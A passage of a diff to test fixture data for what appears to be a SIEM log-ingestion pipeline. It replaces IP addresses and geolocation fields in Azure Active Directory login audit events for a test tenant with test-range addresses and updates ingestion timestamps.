Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970377900Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8198,25 +7130,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8230,7 +7144,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8280,7 +7194,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -8292,12 +7206,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051715500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970383500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8336,25 +7250,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8368,7 +7264,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8418,7 +7314,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8430,12 +7326,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051718200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970389Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8474,25 +7370,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8506,7 +7384,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8556,7 +7434,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8568,12 +7446,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051720900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970394600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8612,25 +7490,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -8644,7 +7504,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -8694,7 +7554,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -8706,12 +7566,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051723700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970400300Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8750,25 +7610,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8782,7 +7624,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8832,7 +7674,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -8844,12 +7686,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051726400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970406Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8888,25 +7730,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8920,7 +7744,7 @@ "ObjectId": 